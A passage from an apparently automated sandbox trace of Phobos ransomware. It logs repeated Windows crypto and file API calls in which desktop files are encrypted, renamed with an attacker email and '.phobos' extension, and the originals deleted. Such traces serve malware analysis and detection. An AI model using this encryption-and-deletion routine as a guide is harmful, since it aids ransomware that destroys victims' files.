pdwDataLen=0x2f4fc48*=0x50) returned 1 [0195.853] CryptDestroyKey (hKey=0xa32de8) returned 1 [0195.853] WriteFile (in: hFile=0x180, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x102, lpOverlapped=0x0) returned 1 [0195.853] CryptDestroyKey (hKey=0xa32d28) returned 1 [0195.853] CloseHandle (hObject=0x134) returned 1 [0195.853] CloseHandle (hObject=0x180) returned 1 [0195.854] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\GyH9tFXtnU2kfsyVw.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gyh9tfxtnu2kfsyvw.pdf")) returned 1 [0195.855] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0195.855] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h9DWAy.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\h9dway.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0195.856] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=6287) returned 1 [0195.856] CloseHandle (hObject=0x180) returned 1 [0195.856] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h9DWAy.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\h9dway.gif")) returned 0x20 [0195.856] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h9DWAy.gif.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\h9dway.gif.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0195.856] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h9DWAy.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\h9dway.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0195.856] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0195.856] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0195.856] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h9DWAy.gif.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\h9dway.gif.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0195.863] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d28) returned 1 [0195.863] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0195.863] ReadFile (in: hFile=0x180, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x188f, lpOverlapped=0x0) returned 1 [0195.863] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1890, dwBufLen=0x1890 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1890) returned 1 [0195.863] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x1890, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x1890, lpOverlapped=0x0) returned 1 [0195.864] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32de8) returned 1 [0195.864] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0195.864] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0195.864] CryptDestroyKey (hKey=0xa32de8) returned 1 [0195.864] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0195.864] CryptDestroyKey (hKey=0xa32d28) returned 1 [0195.864] CloseHandle (hObject=0x180) returned 1 [0195.865] CloseHandle (hObject=0x134) returned 1 [0195.865] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h9DWAy.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\h9dway.gif")) returned 1 [0195.867] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0195.867] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\I7axOhhAwhNWrb.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\i7axohhawhnwrb.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0195.867] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=76027) returned 1 [0195.867] CloseHandle (hObject=0x134) returned 1 [0195.867] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\I7axOhhAwhNWrb.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\i7axohhawhnwrb.avi")) returned 0x20 [0195.867] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\I7axOhhAwhNWrb.avi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\i7axohhawhnwrb.avi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0195.868] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\I7axOhhAwhNWrb.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\i7axohhawhnwrb.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0195.868] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0195.868] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0195.868] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\I7axOhhAwhNWrb.avi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\i7axohhawhnwrb.avi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0195.868] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d28) returned 1 [0195.868] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0195.868] ReadFile (in: hFile=0x134, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x128fb, lpOverlapped=0x0) returned 1 [0195.869] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x12900, dwBufLen=0x12900 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x12900) returned 1 [0195.870] WriteFile (in: hFile=0x180, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x12900, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x12900, lpOverlapped=0x0) returned 1 [0195.872] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32de8) returned 1 [0195.872] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0195.872] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0195.872] CryptDestroyKey (hKey=0xa32de8) returned 1 [0195.872] WriteFile (in: hFile=0x180, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x102, lpOverlapped=0x0) returned 1 [0195.872] CryptDestroyKey (hKey=0xa32d28) returned 1 [0195.872] CloseHandle (hObject=0x134) returned 1 [0195.872] CloseHandle (hObject=0x180) returned 1 [0195.874] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\I7axOhhAwhNWrb.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\i7axohhawhnwrb.avi")) returned 1 [0195.876] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0195.876] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KnNS9WDAiiFvVYz7D-.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\knns9wdaiifvvyz7d-.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0195.876] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=78091) returned 1 [0195.876] CloseHandle (hObject=0x180) returned 1 [0195.876] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KnNS9WDAiiFvVYz7D-.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\knns9wdaiifvvyz7d-.png")) returned 0x20 [0195.876] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KnNS9WDAiiFvVYz7D-.png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\knns9wdaiifvvyz7d-.png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0195.876] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KnNS9WDAiiFvVYz7D-.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\knns9wdaiifvvyz7d-.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0195.876] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0195.877] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0195.877] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KnNS9WDAiiFvVYz7D-.png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\knns9wdaiifvvyz7d-.png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0195.877] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d28) returned 1 [0195.877] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0195.877] ReadFile (in: hFile=0x180, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x1310b, lpOverlapped=0x0) returned 1 [0195.878] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x13110, dwBufLen=0x13110 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x13110) returned 1 [0195.879] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x13110, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x13110, lpOverlapped=0x0) returned 1 [0195.881] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32de8) returned 1 [0195.881] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0195.881] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0195.881] CryptDestroyKey (hKey=0xa32de8) returned 1 [0195.881] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x102, lpOverlapped=0x0) returned 1 [0195.881] CryptDestroyKey (hKey=0xa32d28) returned 1 [0195.881] CloseHandle (hObject=0x180) returned 1 [0195.881] CloseHandle (hObject=0x134) returned 1 [0195.882] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KnNS9WDAiiFvVYz7D-.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\knns9wdaiifvvyz7d-.png")) returned 1 [0195.884] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0195.884] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mJth_o7FSbH0UAsev5.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mjth_o7fsbh0uasev5.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0195.884] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=101557) returned 1 [0195.884] CloseHandle (hObject=0x134) returned 1 [0195.884] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mJth_o7FSbH0UAsev5.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mjth_o7fsbh0uasev5.flv")) returned 0x20 [0195.884] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mJth_o7FSbH0UAsev5.flv.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mjth_o7fsbh0uasev5.flv.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0195.884] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mJth_o7FSbH0UAsev5.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mjth_o7fsbh0uasev5.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0195.884] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0195.885] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0195.885] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mJth_o7FSbH0UAsev5.flv.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mjth_o7fsbh0uasev5.flv.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0195.886] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d28) returned 1 [0195.886] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0195.886] ReadFile (in: hFile=0x134, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x18cb5, lpOverlapped=0x0) returned 1 [0195.887] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x18cc0, dwBufLen=0x18cc0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x18cc0) returned 1 [0195.888] WriteFile (in: hFile=0x180, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x18cc0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x18cc0, lpOverlapped=0x0) returned 1 [0195.890] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32de8) returned 1 [0195.890] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0195.890] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0195.890] CryptDestroyKey (hKey=0xa32de8) returned 1 [0195.890] WriteFile (in: hFile=0x180, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x102, lpOverlapped=0x0) returned 1 [0195.890] CryptDestroyKey (hKey=0xa32d28) returned 1 [0195.890] CloseHandle (hObject=0x134) returned 1 [0195.890] CloseHandle (hObject=0x180) returned 1 [0195.891] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mJth_o7FSbH0UAsev5.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mjth_o7fsbh0uasev5.flv")) returned 1 [0195.892] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0195.892] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NM9OwdEbf-b.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\nm9owdebf-b.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0195.893] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=15688) returned 1 [0195.893] CloseHandle (hObject=0x180) returned 1 [0195.893] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NM9OwdEbf-b.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\nm9owdebf-b.jpg")) returned 0x20 [0195.893] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NM9OwdEbf-b.jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\nm9owdebf-b.jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0195.893] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NM9OwdEbf-b.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\nm9owdebf-b.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0195.893] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0195.893] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0195.893] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NM9OwdEbf-b.jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\nm9owdebf-b.jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0195.894] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d28) returned 1 [0195.894] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0195.894] ReadFile (in: hFile=0x180, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x3d48, lpOverlapped=0x0) returned 1 [0195.895] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x3d50, dwBufLen=0x3d50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x3d50) returned 1 [0195.895] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x3d50, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x3d50, lpOverlapped=0x0) returned 1 [0195.896] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32de8) returned 1 [0195.896] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0195.896] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0195.896] CryptDestroyKey (hKey=0xa32de8) returned 1 [0195.896] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0195.896] CryptDestroyKey (hKey=0xa32d28) returned 1 [0195.896] CloseHandle (hObject=0x180) returned 1 [0195.896] CloseHandle (hObject=0x134) returned 1 [0195.897] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NM9OwdEbf-b.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\nm9owdebf-b.jpg")) returned 1 [0195.900] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0195.900] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\o4Djq-x2uVL\\20AsLgTrMkZkMHopn.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\o4djq-x2uvl\\20aslgtrmkzkmhopn.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0195.922] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=63686) returned 1 [0195.923] CloseHandle (hObject=0x134) returned 1 [0195.923] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\o4Djq-x2uVL\\20AsLgTrMkZkMHopn.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\o4djq-x2uvl\\20aslgtrmkzkmhopn.m4a")) returned 0x20 [0195.923] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 